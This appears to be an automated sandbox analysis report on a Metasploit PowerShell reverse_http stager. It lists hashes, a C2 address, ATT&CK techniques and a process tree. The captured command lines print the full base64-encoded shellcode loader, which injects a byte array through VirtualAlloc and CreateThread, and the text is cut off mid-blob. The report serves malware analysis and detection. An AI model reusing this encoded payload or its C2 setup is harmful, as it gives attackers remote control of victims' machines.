metasploit | 405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431

General

Target

405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431.ps1
Size

8KB
MD5

1195ad87cfc060272b60133c613b928e
SHA1

d6325814107fd10ba6f63a11ecb5b796553b291b
SHA256

405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431
SHA512

f0609f25c9c95cb6ec6419e6c93332731a621243a02416c4f15b0edcbf7ffc12382c08cd5a65a9fc765b62cb2e8967ca7edee027e726b061d139615588489199
SSDEEP

96:zCTRX/T7Dh9pPKZT3Aasj0AwCATxuc23s5GeaWy7V1Xf4ymxtgqkfuaMk09clOm:zaF7Dh/PO3AaI2LxUlC5xtgqkfhMzcOm

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.18.129:8080/UY2jjW-iTdaTLZIs9Bq1pQ1u1z9L8

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3580	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3580	powershell.exe
3580	powershell.exe
4984	powershell.exe
4984	powershell.exe
4284	powershell.exe
4284	powershell.exe
648	powershell.exe
648	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	648	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 3580 wrote to memory of 4984	3580	powershell.exe	86
PID 3580 wrote to memory of 4984	3580	powershell.exe	86
PID 4984 wrote to memory of 4284	4984	powershell.exe	87
PID 4984 wrote to memory of 4284	4984	powershell.exe	87
PID 4284 wrote to memory of 648	4284	powershell.exe	89
PID 4284 wrote to memory of 648	4284	powershell.exe	89
PID 4284 wrote to memory of 648	4284	powershell.exe	89
PID 648 wrote to memory of 1684	648	powershell.exe	90
PID 648 wrote to memory of 1684	648	powershell.exe	90
PID 648 wrote to memory of 1684	648	powershell.exe	90
PID 1684 wrote to memory of 5032	1684	csc.exe	91
PID 1684 wrote to memory of 5032	1684	csc.exe	91
PID 1684 wrote to memory of 5032	1684	csc.exe	91

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv FDG -;sv Q ec;sv ZzY ((gv FDG).value.toString()+(gv Q).value.toString());powershell (gv ZzY).value.toString() 'JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA=='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA